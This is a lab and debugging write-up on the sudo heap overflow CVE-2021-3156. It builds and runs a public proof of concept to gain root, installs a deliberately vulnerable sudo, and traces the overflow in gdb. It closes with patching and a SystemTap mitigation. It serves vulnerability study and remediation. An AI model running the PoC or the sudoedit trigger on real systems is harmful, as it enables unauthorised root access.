文章来源: 天禧信安
# Lab setup: the first line needs root; do all of this in a disposable VM only.
useradd doge
su doge
whoami
# doge
# Confirm the account has no sudo rights before running the PoC, so that the
# root shell obtained below can only come from the bug, not from sudoers.
sudo apt install git
# doge is not in the sudoers file.  This incident will be reported.
git clone https://github.com/blasty/CVE-2021-3156.git
cd CVE-2021-3156
make
# Run without arguments to get the PoC's help text (reproduced below).  The
# argument placeholders after the "usage:" and "manual mode:" lines appear to
# have been stripped when this page was extracted; check the PoC's own output.
./sudo-hax-me-a-sandwich
#** CVE-2021-3156 PoC by blasty
#
# usage: ./sudo-hax-me-a-sandwich
#
# available targets:
# ------------------------------------------------------------
# 0) Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27
# 1) Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31
# 2) Debian 10.0 (Buster) - sudo 1.8.27, libc-2.28
# ------------------------------------------------------------
#
# manual mode:
# ./sudo-hax-me-a-sandwich
# The PoC is tuned per target (the distro, sudo and libc versions listed
# above); the tuple printed after the target name appears to be those per-target
# parameters.  On a different sudo/libc build, pick the matching target or
# expect the attempt to fail rather than work out of the box.
./sudo-hax-me-a-sandwich 0
# ** CVE-2021-3156 PoC by blasty
#
# using target: Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27 ['/usr/bin/sudoedit'](56, 54, 63, 212)
# ** pray for your rootshell.. **
# [+] bl1ng bl1ng! We got it!
whoami
# root
# Tooling for the debugging session.
sudo apt install cgdb
# sudo 1.9.5p1 is the last release *before* the fix (CVE-2021-3156 was fixed in
# 1.9.5p2): this deliberately builds a vulnerable sudo in order to step through
# the bug.
wget https://github.com/sudo-project/sudo/archive/SUDO_1_9_5p1.tar.gz
tar xf SUDO_1_9_5p1.tar.gz
cd sudo-SUDO_1_9_5p1
# Out-of-tree build from build/.  The relative source paths used in the gdb
# session later (../../../plugins/sudoers/...) come from this layout.
mkdir build
cd build
../configure --enable-env-debug
make -j
# This installs the vulnerable, debug-enabled sudo onto the system as a
# setuid-root binary.  Only do this in a throwaway VM, and reinstall the distro
# package afterwards (see the "apt upgrade" step further down).
sudo make install
# Trigger: -s selects shell mode, and '\' passes a single, unescaped trailing
# backslash as argv[1].  The second argument is just bytes that happen to sit
# right behind it in memory (the stack dump later shows this).  cgdb is started
# through sudo because sudoedit is setuid root: started under a debugger by an
# unprivileged user, the setuid bit is not honoured and the code under test
# would not run the way it does in practice.
sudo cgdb --args sudoedit -s '\' 1145141919810
# Always debug this as root!
(gdb) b ../../../plugins/sudoers/sudoers.c:964
No source file named ../../../plugins/sudoers/sudoers.c.
Make breakpoint pending on future shared library load? (y or [n]) y
Breakpoint 1 (../../../plugins/sudoers/sudoers.c:964) pending.
(gdb) # Note: the working directory is still build/ (the tree was configured out-of-tree from there), so the breakpoint must use the relative source path the build recorded, ../../../plugins/sudoers/sudoers.c. gdb reports "No source file named ..." because sudoers.so is a plugin that is loaded after sudoedit starts; answer y and the pending breakpoint resolves once it is loaded.
/* set user_args */
if (NewArgc > 1) {
char *to, *from, **av;
size_t size, n;
/* Alloc and build up user_args. */
/*
 * The buffer is sized from strlen() of each argument plus one byte for the
 * separator/terminator.  That bound is only valid if the copy loop below
 * never reads past an argument's terminating NUL -- which is exactly what
 * an argument ending in a lone backslash makes it do (CVE-2021-3156).
 */
for (size = 0, av = NewArgv + 1; *av; av++)
    size += strlen(*av) + 1;
if (size == 0 || (user_args = malloc(size)) == NULL) {
    sudo_warnx(U_("%s: %s"), __func__, U_("unable to allocate memory"));
    debug_return_int(NOT_FOUND_ERROR);
}
if (ISSET(sudo_mode, MODE_SHELL|MODE_LOGIN_SHELL)) { /* gdb stops here (breakpoint 1) */
    /*
     * When running a command via a shell, the sudo front-end
     * escapes potential meta chars. We unescape non-spaces
     * for sudoers matching and logging purposes.
     */
    /*
     * CVE-2021-3156.  user_args was sized above from strlen() of each argv
     * entry, so this loop must never read beyond an entry's NUL.  If an
     * argument ends in a lone backslash, from[1] is that NUL; isspace('\0')
     * is false, so from++ steps onto the NUL, "*to++ = *from++" copies it
     * and moves past it, and while (*from) keeps going through whatever
     * follows in memory (the stack dump later in this article shows argv[2]
     * stored directly behind argv[1]).  Every extra byte is written into
     * user_args beyond the malloc(size) bound -- a heap overflow.  The
     * comment above assumes the front-end already escaped such input; the
     * sudoedit -s invocation used here reaches this code with the backslash
     * unescaped (gdb shows NewArgv[1] == "\\").
     */
    for (to = user_args, av = NewArgv + 1; (from = *av); av++) {
        while (*from) {
            /* Drop the escaping backslash unless it precedes whitespace.
             * Nothing here excludes the case where from[1] is '\0'. */
            if (from[0] == '\\' && !isspace((unsigned char)from[1]))
                from++;
            *to++ = *from++;
        }
        *to++ = ' ';   /* argument separator; also unbounded once overflowing */
    }
    *--to = '\0';      /* overwrite the trailing separator with the terminator */
}
/* Alloc and build up user_args. */
/*
 * Repeated here for the gdb check that follows: with the arguments "\" and
 * "1145141919810" (1 and 13 bytes) this gives (1+1) + (13+1) = 16, the value
 * "p size" prints.  Only 16 bytes are allocated, yet the copy loop goes on
 * to write well past that.
 */
for (size = 0, av = NewArgv + 1; *av; av++)
    size += strlen(*av) + 1;
if (size == 0 || (user_args = malloc(size)) == NULL) {
    sudo_warnx(U_("%s: %s"), __func__, U_("unable to allocate memory"));
    debug_return_int(NOT_FOUND_ERROR);
}
(gdb) p size
$1 = 16
(gdb) p NewArgv
$2 = (char **) 0x55c42f87f708
(gdb) p NewArgv+25
$3 = (char **) 0x55c42f87f7d0
(gdb) x/8xg 0x55c42f87f7d0
0x55c42f87f7d0: 0x00007f041be3fca0 0x00007f041be3fca0
0x55c42f87f7e0: 0x0000000000000000 0x0000000000000c21
0x55c42f87f7f0: 0x00007f041be3fca0 0x00007f041be3fca0
0x55c42f87f800: 0x0000000000000000 0x0000000000000000
user_args — the unescaping copy loop in set_cmnd() that fills it:
/* The unescaping copy loop again, as stepped through in gdb below. */
for (to = user_args, av = NewArgv + 1; (from = *av); av++) {
    while (*from) {
        /*
         * Note this test: for a trailing backslash, from[1] is '\0', which
         * is not a space, so from is advanced onto the NUL.  The next line
         * then copies the NUL and steps past it, and the loop carries on
         * into the bytes after the argument -- the gdb dump below shows
         * argv[2] stored right behind it -- writing beyond the end of
         * user_args.
         */
        if (from[0] == '\\' && !isspace((unsigned char)from[1]))
            from++;
        *to++ = *from++;
    }
    *to++ = ' ';
}
/* Re-quoted by the author: the check only excludes whitespace after the
 * backslash.  A terminating NUL passes it, so from++ lands on the NUL. */
if (from[0] == '\\' && !isspace((unsigned char)from[1]))
    from++;
(gdb) p NewArgv[1]
$4 = 0x7ffec3f74315 "\\"
(gdb) x/20xb 0x7ffec3f74315
0x7ffec3f74315: 0x5c 0x00 0x31 0x31 0x34 0x35 0x31 0x34
0x7ffec3f7431d: 0x31 0x39 0x31 0x39 0x38 0x31 0x30 0x00
0x7ffec3f74325: 0x43 0x4c 0x55 0x54
(gdb) p size
$1 = 16
(gdb) b ../../../plugins/sudoers/sudoers.c:978
Breakpoint 2 at 0x7ff42c055f01: file ../../../plugins/sudoers/sudoers.c, line 978.
(gdb) c
Continuing.
Breakpoint 2, set_cmnd () at ../../../plugins/sudoers/sudoers.c:978
(gdb) p to
$5 = 0x5572bbba57ec " "
(gdb) p 0x5572bbba57ec-0x5572bbba57d0
$6 = 28
(gdb) # The VM was rebooted between the two runs, so the addresses differ:
(gdb) # without the reboot, 0x5572bbba57d0 here would be the user_args
(gdb) # address computed above (0x55c42f87f7d0).  Compare the two dumps: in
(gdb) # the earlier one the qword at +0x18 was 0xc21, which looks like the
(gdb) # size field of the next heap chunk; here the same slot holds
(gdb) # 0x2030313839 ("9810 ").  The 16-byte allocation has been overrun
(gdb) # (to - user_args is 28) and the neighbouring chunk's metadata
(gdb) # overwritten with command-line bytes.
(gdb) x/8xg 0x5572bbba57d0
0x5572bbba57d0: 0x3134313534313100 0x3120303138393139
0x5572bbba57e0: 0x3139313431353431 0x0000002030313839
0x5572bbba57f0: 0x00007ff42daabca0 0x00007ff42daabca0
0x5572bbba5800: 0x0000000000000000 0x0000000000000000
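# Remediation: update the sudo package.  The upstream fix is in sudo 1.9.5p2;
# distributions backport it, so the package version string differs per distro.
sudo apt update
sudo apt upgrade   # or just: sudo apt install sudo
# Verify what is actually on PATH afterwards.  The source build installed
# earlier with "sudo make install" went to its own configure prefix (likely
# /usr/local, not /usr), so the package upgrade does not replace it; every
# sudo/sudoedit listed here must be the patched one -- remove any leftover
# build.
which -a sudo sudoedit
sudo --version | head -1
# Final check: rerun the PoC from above as the unprivileged user; it must fail.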
# Temporary mitigation (the Red Hat-style SystemTap workaround).  This install
# line is for RHEL/CentOS; on Debian/Ubuntu install systemtap and the matching
# linux-headers package instead.
yum install systemtap yum-utils kernel-devel-"$(uname -r)"
vim sudoedit.stap
# Write the following into the file:
# probe process("/usr/bin/sudo").function("main") {
# command = cmdline_args(0,0,"");
# if (strpos(command, "edit") >= 0) {
# raise(9);
# }
# }
# What it does: at sudo's main(), if the full command line contains the
# substring "edit" anywhere, the process is killed with SIGKILL (9).  That
# covers the sudoedit invocation used in this article, but it is blunt: any
# sudo command line containing "edit" (a package or file name, say) is killed
# too.  Run it as root; -g enables guru mode, which the raise() call needs.
nohup stap -g sudoedit.stap &
# Note: this measure does not survive a reboot.
# Once the patched package is installed, undo the temporary measure as
# follows (replace the placeholder with the PID of the stap process, e.g.
# from "pgrep -f sudoedit.stap"):
kill -s SIGTERM systemtap进程PID